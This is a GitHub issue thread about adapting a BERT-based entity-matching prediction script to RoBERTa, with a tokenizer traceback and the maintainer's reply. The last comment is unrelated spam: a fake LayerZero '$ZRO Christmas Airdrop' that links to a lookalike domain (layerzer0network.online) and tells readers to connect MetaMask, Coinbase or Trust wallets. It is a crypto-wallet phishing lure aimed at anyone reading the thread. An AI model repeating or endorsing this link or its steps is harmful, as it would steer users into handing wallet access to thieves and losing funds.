### ISSUE TITLE
Running predictions on RoBERTa model

### ISSUE THREAD

**Issue by jweckschmied** [brunnurs/entity-matching-transformer#1]
How would one have to adjust `run_predictions.py` to work with a roberta model? 
I tried changing the tokenizer to `RobertaTokenizer` and set the data loader to `model_type=roberta` but that doesn't seem to change anything. It's still looking for vocab.txt, which doesn't exist.

```
Didn't find file experiments/ABT_BUY__ROBERTA__20200718_161003/vocab.txt. We won't load it.
loading file None
loading file experiments/ABT_BUY__ROBERTA__20200718_161003/added_tokens.json
loading file experiments/ABT_BUY__ROBERTA__20200718_161003/special_tokens_map.json
loading file experiments/ABT_BUY__ROBERTA__20200718_161003/tokenizer_config.json
Traceback (most recent call last):
  File "/home/jonas/Bachelor-Arbeit/entity-matching-transformer/src/run_prediction.py", line 21, in <module>
    model, tokenizer = load_model(os.path.join(args.model_output_dir, args.trained_model_for_prediction), args.do_lower_case)
  File "/home/jonas/Bachelor-Arbeit/entity-matching-transformer/src/model.py", line 26, in load_model
    tokenizer = BertTokenizer.from_pretrained(model_dir, do_lower_case=do_lower_case)
  File "/home/jonas/anaconda3/envs/bert/lib/python3.8/site-packages/pytorch_transformers/tokenization_utils.py", line 293, in from_pretrained
    return cls._from_pretrained(*inputs, **kwargs)
  File "/home/jonas/anaconda3/envs/bert/lib/python3.8/site-packages/pytorch_transformers/tokenization_utils.py", line 421, in _from_pretrained
    tokenizer = cls(*init_inputs, **init_kwargs)
  File "/home/jonas/anaconda3/envs/bert/lib/python3.8/site-packages/pytorch_transformers/tokenization_bert.py", line 149, in __init__
    if not os.path.isfile(vocab_file):
  File "/home/jonas/anaconda3/envs/bert/lib/python3.8/genericpath.py", line 30, in isfile
    st = os.stat(path)
TypeError: stat: path should be string, bytes, os.PathLike or integer, not NoneType 
```

**Comment by Raidus** [comment]
Hi, are you able to run the code?

**Comment by brunnurs** [comment]
Hey guys, you should be able to run the code with BERT out of the box. I once invested 2h to use RoBERTa instead, but it didn't work out of the box. I now refactored the code to use BART instead of BERT which does improve performance. I will release this code, but need to wait until the latest paper is out.

**Comment by gqgserver** [comment]
# $1000 Christmas Airdrop for 10,000 Eligible Users! 🎅🎁

Welcome to the festive $1000 Christmas Airdrop by LayerZero! Get ready to unwrap the joy and claim your share of $ZRO tokens. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*SalqMtUhedutBSfrW7-T-A.png)

## Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Christmas Spirit:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&text=LayerZero+Christmas+Airdrop)
   - **Instagram:**
     [Share on Instagram](https://instagram.com/share?url=https://medium.com/@rlgon_49273/unwrap-joy-1000-christmas-airdrop-for-10-000-eligible-users-96741f346c2d&title=LayerZero+Christmas+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero Christmas Airdrop and secure your $ZRO tokens.

Don't miss out on this festive collaboration – claim your Christmas tokens now and let the holiday spirit shine with LayerZero!
